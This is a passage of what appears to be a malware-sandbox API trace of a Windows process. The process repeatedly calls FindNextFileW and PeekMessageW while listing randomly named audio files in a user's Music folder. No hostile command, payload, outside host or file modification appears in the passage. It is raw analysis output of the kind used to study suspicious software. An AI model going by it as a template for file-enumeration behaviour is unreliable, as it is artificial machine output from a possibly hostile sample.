wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\*", lpFindFileData=0x87df28 | out: lpFindFileData=0x87df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5992d6e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x6a6a3790, ftLastAccessTime.dwHighDateTime=0x1d5e1af, ftLastWriteTime.dwLowDateTime=0x6a6a3790, ftLastWriteTime.dwHighDateTime=0x1d5e1af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90b158 [0157.903] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df28 | out: lpFindFileData=0x87df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5992d6e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x6a6a3790, ftLastAccessTime.dwHighDateTime=0x1d5e1af, ftLastWriteTime.dwLowDateTime=0x6a6a3790, ftLastWriteTime.dwHighDateTime=0x1d5e1af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.903] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df28 | out: lpFindFileData=0x87df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301269d0, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0xda3bfd50, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0xda3bfd50, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="HdCQAGk.mp3", cAlternateFileName="")) returned 1 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.903] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63150, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x3328d30, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x3328d30, ftLastWriteTime.dwHighDateTime=0x1d5db32, nFileSizeHigh=0x0, nFileSizeLow=0xf5b7, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="iytLsFHuHj3z6gYMj.m4a", cAlternateFileName="IYTLSF~1.M4A")) returned 1 [0157.903] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c108870, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x200a6cc0, ftLastAccessTime.dwHighDateTime=0x1d5e384, ftLastWriteTime.dwLowDateTime=0x200a6cc0, ftLastWriteTime.dwHighDateTime=0x1d5e384, nFileSizeHigh=0x0, nFileSizeLow=0x1227f, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="O8LnB5uJ.mp3", cAlternateFileName="")) returned 1 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d2450, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0xc396bae0, ftLastAccessTime.dwHighDateTime=0x1d5d8a0, ftLastWriteTime.dwLowDateTime=0xc396bae0, ftLastWriteTime.dwHighDateTime=0x1d5d8a0, nFileSizeHigh=0x0, nFileSizeLow=0xb998, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="pKoP0.mp3", cAlternateFileName="")) returned 1 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.904] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae40630, ftCreationTime.dwHighDateTime=0x1d5dbba, ftLastAccessTime.dwLowDateTime=0xa2987a80, ftLastAccessTime.dwHighDateTime=0x1d5e805, ftLastWriteTime.dwLowDateTime=0xa2987a80, ftLastWriteTime.dwHighDateTime=0x1d5e805, nFileSizeHigh=0x0, nFileSizeLow=0xbbd, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="S1qr7.wav", cAlternateFileName="")) returned 1 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.905] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe5ec70, ftCreationTime.dwHighDateTime=0x1d5d8d9, ftLastAccessTime.dwLowDateTime=0xa5315d20, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0xa5315d20, ftLastWriteTime.dwHighDateTime=0x1d5e38c, nFileSizeHigh=0x0, nFileSizeLow=0x8f92, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="WWUbMhmKz.wav", cAlternateFileName="WWUBMH~1.WAV")) returned 1 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd34cb0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x4145b680, ftLastAccessTime.dwHighDateTime=0x1d5de2d, ftLastWriteTime.dwLowDateTime=0x4145b680, ftLastWriteTime.dwHighDateTime=0x1d5de2d, nFileSizeHigh=0x0, nFileSizeLow=0x7b69, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="y3qZNbvqKQ2uR4UOsf8q.wav", cAlternateFileName="Y3QZNB~1.WAV")) returned 1 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.906] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.907] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.907] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x18c0034, ftCreationTime.dwLowDateTime=0x4a26, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x1d, ftLastWriteTime.dwHighDateTime=0x1820035, nFileSizeHigh=0x4a26, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="y3\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.907] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.907] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.907] FindClose (in: hFindFile=0x90b158 | out: hFindFile=0x90b158) returned 1 [0157.908] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b8c90, ftCreationTime.dwHighDateTime=0x1d5e3a0, ftLastAccessTime.dwLowDateTime=0x90f56120, ftLastAccessTime.dwHighDateTime=0x1d5d9a1, ftLastWriteTime.dwLowDateTime=0x90f56120, ftLastWriteTime.dwHighDateTime=0x1d5d9a1, nFileSizeHigh=0x0, nFileSizeLow=0xd1c3, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="JRSQYNIKKQeiTV.mp3", cAlternateFileName="JRSQYN~1.MP3")) returned 1 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d4760, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x2c837c60, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x2c837c60, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="kDBYwX3doPBMqwfNV.m4a", cAlternateFileName="KDBYWX~1.M4A")) returned 1 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.908] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7dbe0c0, ftCreationTime.dwHighDateTime=0x1d5e7f2, ftLastAccessTime.dwLowDateTime=0xd4fff520, ftLastAccessTime.dwHighDateTime=0x1d5d946, ftLastWriteTime.dwLowDateTime=0xd4fff520, ftLastWriteTime.dwHighDateTime=0x1d5d946, nFileSizeHigh=0x0, nFileSizeLow=0x18c81, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="ObhGwH4nj0Pk.wav", cAlternateFileName="OBHGWH~1.WAV")) returned 1 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84061af0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x36fe5e90, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x36fe5e90, ftLastWriteTime.dwHighDateTime=0x1d5da70, nFileSizeHigh=0x0, nFileSizeLow=0x12af2, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="uvLMHuUMLBjPgdhq.mp3", cAlternateFileName="UVLMHU~1.MP3")) returned 1 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.909] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf0c5e0, ftCreationTime.dwHighDateTime=0x1d5e693, ftLastAccessTime.dwLowDateTime=0xef68d520, ftLastAccessTime.dwHighDateTime=0x1d5dea6, ftLastWriteTime.dwLowDateTime=0xef68d520, ftLastWriteTime.dwHighDateTime=0x1d5dea6, nFileSizeHigh=0x0, nFileSizeLow=0x2435, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="X4YFdz60f6cKTl.wav", cAlternateFileName="X4YFDZ~1.WAV")) returned 1 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf356ccc0, ftCreationTime.dwHighDateTime=0x1d5e47b, ftLastAccessTime.dwLowDateTime=0x91c4fd00, ftLastAccessTime.dwHighDateTime=0x1d5e17f, ftLastWriteTime.dwLowDateTime=0x91c4fd00, ftLastWriteTime.dwHighDateTime=0x1d5e17f, nFileSizeHigh=0x0, nFileSizeLow=0x10526, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Xxiiq96uF_.wav", cAlternateFileName="XXIIQ9~1.WAV")) returned 1 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.910] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.911] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x1680045, ftCreationTime.dwLowDateTime=0x4a8c, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x15e0046, nFileSizeHigh=0x4a8c, nFileSizeLow=0x2f, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="\x87\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.911] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.911] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.911] FindClose (in: hFindFile=0x90b098 | out: hFindFile=0x90b098) returned 1 [0157.911] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.911] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.911] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, 